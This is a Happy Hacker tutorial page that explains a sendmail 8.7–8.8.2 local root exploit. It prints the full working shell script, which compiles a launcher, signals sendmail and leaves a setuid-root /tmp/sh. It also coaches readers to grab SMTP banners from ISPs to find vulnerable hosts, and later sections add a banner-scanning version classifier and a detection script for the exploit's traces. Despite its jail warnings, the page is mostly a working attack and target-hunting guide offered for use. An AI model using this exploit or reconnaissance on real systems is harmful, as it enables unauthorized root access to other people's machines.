Shell Programming: an Exploit Explained, continued...

AN EXPLOIT EXPLAINED   

        Here's a fun, simple, powerful shell script. This is a goodie that you might be able to use from your shell account to create a root shell for yourself on the computer where you have your shell.

==========================================================

Newbie note: A "root shell" is a command shell running as root, the superuser, so it allows you to do anything you wish to the computer you are on.

==========================================================

==========================================================

You can go to jail warning: In the US and many other countries, it is illegal even to just get a root shell on someone else's computer -- unless that person agrees to let you get root.

===========================================================

          If you are determined to test this shell script, there are ways to do this legally.  Number one, install some form of Unix on your home computer. The easiest to install is Red Hat Linux, available at http://www.redhat.com. The easiest to get exploits to run on is Debian Linux, at http://www.debian.org.  For other Linux sources, see the GTMHH "Linux!" at http://www.happyhacker.org. (Note: the exploit below only lets someone who already has an ordinary user's shell account on the machine get a root -- superuser -- shell. It is a local privilege escalation, not a remote break-in.)

        Make sure your Linux is running an outdated sendmail program, versions 8.7 through 8.8.2.

        Next set up user accounts on your home Linux box.  The command is "adduser."

        Then run this exploit from your user account on your home computer.  If you have the right version of sendmail, you will be amazed at how easy it is to break in.

        The other way to legally run this exploit is to get permission to break into someone else's computer.  Soon our Hacker Wargame will offer accounts on a newbie computer that will allow this exploit.

        Don't assume you can get away with running this script against a stranger's computer.  There is no way to be absolutely certain you won't get caught.

Besides, if you have to read this to learn how to break into a computer, you don't know enough to have even a hope of getting away with the crime.

        Once you try this exploit you will know how ridiculously easy it is to break into computers. If someone gets busted for breaking into a computer using this shell script, yeah, sure, the media will make out like the person who ran it is a genius.  But you are about to learn that a little kid could break into a computer that runs a vulnerable version of sendmail.  It's that easy.  So anyone who is in the know realizes that it doesn't take brains to break into a computer.  They will simply agree with Fatal Error that "To err is human; to get caught is just plain stupid."

        Here is how to break into a computer that runs sendmail 8.7 through 8.8.2 on the Linux and FreeBSD operating systems.

1) Look for an Internet service provider running a vulnerable version of sendmail. To do this, get the domain names of some ISPs from http://www.celestin.com/pocia. Another way to get ISP names is from people's email addresses.

        Then try telnetting to their smtp (mail server) port, port 25, and read the greeting the server sends.  Use the command:

telnet fubar.com smtp

Trying 208.999.37.180...
Connected to fubar.com (208.999.37.180).
Escape character is '^]'.
220 lobo.net ESMTP

        Now there is a smart ISP.  The greeting says only "ESMTP" and does not tell strangers what mail server program they run, let alone which version.  But pretty soon you will hit an ISP that advertises a vulnerable version right in the greeting.  You will get a message like this:

telnet foominds.com smtp

Trying 209.999.14.99...
Connected to foominds.com (209.999.14.99).
Escape character is '^]'.
220 zuni Sendmail SMI-8.7/SMI-SVR4 ready at Sun, 3 May 1998 14:43:07 -0700

        OK, we have a vulnerable version of sendmail.  But does it also have a vulnerable operating system?  You can find that out by telnetting to the login port (telnet, port 23) and reading the banner that comes before the login prompt:

telnet foominds.com

Trying 209.999.14.99...
Connected to foominds.com (209.999.14.99).
Escape character is '^]'.


UNIX(r) System V Release 4.0 (zuni)

login:

        We struck out here -- maybe.  The login banner says System V Release 4.0, and the "SMI" in the sendmail greeting marks Sun's build, so this box is neither Linux nor FreeBSD.  The script's own header only claims Linux and FreeBSD ("and may be other platforms"), so it may or may not work on this ISP.
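The two recon steps above, done by script instead of by eye: pull the SMTP greeting, pick the sendmail version out of it, and decide whether it falls in the 8.7 through 8.8.2 range this guide targets. This is an added example, not code from the guide or from the exploit's author. The greetings it is run on are constructed here (the hostnames in them are made up), and the live fetch assumes bash, since /dev/tcp and the read timeout are bash features.

```shell
#!/bin/bash
# Added example, not part of the original guide: classify SMTP greetings the
# way the walkthrough above does by hand.  Sample greetings are constructed.

# Print the first sendmail version number named in a greeting line, e.g.
# "8.7" from "220 zuni Sendmail SMI-8.7/SMI-SVR4 ready at ...".  Prints
# nothing when the greeting does not name sendmail (the "smart ISP" case).
sendmail_version() {
    printf '%s\n' "$1" |
        sed -n 's/.*[Ss]endmail[^0-9]*\([0-9][0-9]*\.[0-9][0-9]*\(\.[0-9][0-9]*\)\{0,1\}\).*/\1/p'
}

# Exit 0 when the version is 8.7.x or 8.8.0 through 8.8.2, exit 1 otherwise
# (8.8.3 and later, and any other major release, are treated as fixed).
is_vulnerable_sendmail() {
    IFS=. read -r major minor patch <<EOF
$1
EOF
    patch=${patch:-0}
    [ "$major" -eq 8 ] || return 1
    [ "$minor" -eq 7 ] && return 0
    [ "$minor" -eq 8 ] && [ "$patch" -le 2 ] && return 0
    return 1
}

# Verdict for one greeting: "unknown", "vulnerable VER" or "fixed VER".
classify_banner() {
    ver=$(sendmail_version "$1")
    if [ -z "$ver" ]; then
        echo unknown
    elif is_vulnerable_sendmail "$ver"; then
        echo "vulnerable $ver"
    else
        echo "fixed $ver"
    fi
}

# Live version of the "telnet host smtp" step (bash only: /dev/tcp and the
# -t read timeout).  The telnet-port login banner check stays manual, because
# that port negotiates terminal options before it prints anything readable.
grab_smtp_banner() {
    { IFS= read -r -t 5 line && printf '%s\n' "$line"; } < "/dev/tcp/$1/25"
}

# Demo on constructed greetings; run "grab_smtp_banner host" for a live one.
for banner in \
    '220 lobo.net ESMTP' \
    '220 zuni Sendmail SMI-8.7/SMI-SVR4 ready at Sun, 3 May 1998 14:43:07 -0700' \
    '220 mail.example.net ESMTP Sendmail 8.8.2/8.8.2; Sun, 3 May 1998 14:50:11 -0700' \
    '220 mail.example.org ESMTP Sendmail 8.8.5/8.8.5; Sun, 3 May 1998 14:51:02 -0700'
do
    printf '%-16s <- %s\n' "$(classify_banner "$banner")" "$banner"
done
```

The version test deliberately stops at the range the guide names; a greeting with no version at all comes back "unknown" rather than "fixed", because a hidden banner says nothing about what is actually running.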

        Let's say you find an ISP where this exploit is certain to work.  Your next step is to buy an account on this ISP.

===========================================================

You can go to jail warning:  The way I am showing you to break into a computer is GUARANTEED to get you caught.  Don't do this unless you have first gotten permission to try it out from the owner of your ISP.  If you discover your ISP is vulnerable, your best bet is not to break in.  Instead, politely tell tech support they are vulnerable, and offer to show them how to break in.  They might say "Yes, please show us how it's done"!  Then it will be OK to run this script.

===========================================================

        Now comes the fun part.  Give the command "pico s.sh" (or substitute your favorite editor for "pico").  That brings up an editor program.  Next, put in the following shell commands, save the file, and run it with "sh s.sh":

#
#
#                                   Hi !
#                This is exploit for sendmail smtpd bug
#    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
#         This shell script does a root shell in /tmp directory.
#          If you have any problems with it, drop me a letter.
#                                Have fun !
#
#
#                           ----------------------
#               ---------------------------------------------
#    -----------------   Dedicated to my beautiful lady   ------------------
#               ---------------------------------------------
#                           ----------------------
#
#          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
# Stage 1: a launcher that runs the real, setuid-root sendmail binary but
# hands it "/tmp/smtpd" as argv[0].  The basename "smtpd" makes sendmail
# start in daemon mode and go to the background, and a vulnerable sendmail
# re-executes whatever argv[0] names, as root, when it receives SIGHUP.
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c
#
#
# Stage 2: the program that sendmail will run as root in its own place.  It
# drops a copy of /bin/sh in /tmp and makes it setuid root ("a=rsx" gives
# every user read and execute plus the setuid and setgid bits).
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
#
#
# Build both, start sendmail through the launcher, then find the daemon
# (ps now lists it as /tmp/smtpd), pull its PID out of the ps line and send
# it SIGHUP so that it re-executes /tmp/smtpd as root.
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
# Remove the sources and the fake smtpd; only the setuid /tmp/sh is left.
rm leshka.c leshka smtpd.c /tmp/smtpd
echo "Now type:   /tmp/sh"
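Seen from the administrator's side, the script above leaves two traces while it runs: a sendmail daemon that ps lists under the fake name /tmp/smtpd, and a root-owned setuid copy of /bin/sh at /tmp/sh. The following check looks for both. It is an added example, not part of the guide or of Leshka's script; the list of temp directories and the ps keywords are assumptions about a typical Linux or BSD box, and the ps listing embedded in the block is constructed.

```shell
#!/bin/sh
# Added example, not from the original guide: look for what the exploit
# leaves behind.  Temp directory list and ps keywords are assumptions.

# Filter a "ps -eo pid,user,args" listing (header included) on stdin down to
# processes whose program path lives in a world-writable temp directory.
procs_running_from_tmp() {
    awk 'NR > 1 && $3 ~ "^/(tmp|var/tmp|dev/shm)/"'
}

# List regular files below $1 with the setuid bit set.  The exploit's
# /tmp/sh is one: "chmod a=rsx" leaves it mode r-sr-xr-x, owned by root.
setuid_files_under() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Live scan of the local box.
check_host() {
    echo '== processes started from a temp directory =='
    ps -eo pid,user,args | procs_running_from_tmp
    echo '== setuid files in temp directories =='
    for d in /tmp /var/tmp /dev/shm; do
        if [ -d "$d" ]; then setuid_files_under "$d"; fi
    done
}

# Constructed listing, as ps might show it while the renamed sendmail daemon
# (PID 4711 here, invented) is waiting for its SIGHUP.
SAMPLE_PS='  PID USER     COMMAND
    1 root     /sbin/init
  312 root     /usr/sbin/sendmail -bd -q30m
 4711 root     /tmp/smtpd
 4712 alice    -sh'

# Demo: the constructed listing first, then the live scan.
echo '== constructed listing =='
printf '%s\n' "$SAMPLE_PS" | procs_running_from_tmp
check_host
```

A healthy box prints nothing under either heading. The process filter keys on the program path, not on the name "smtpd", because the launcher could have used any name under /tmp; the file check catches the shell even after the daemon has been killed, which is the state the script leaves behind once it has run.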


 © 2013 Happy Hacker All rights reserved.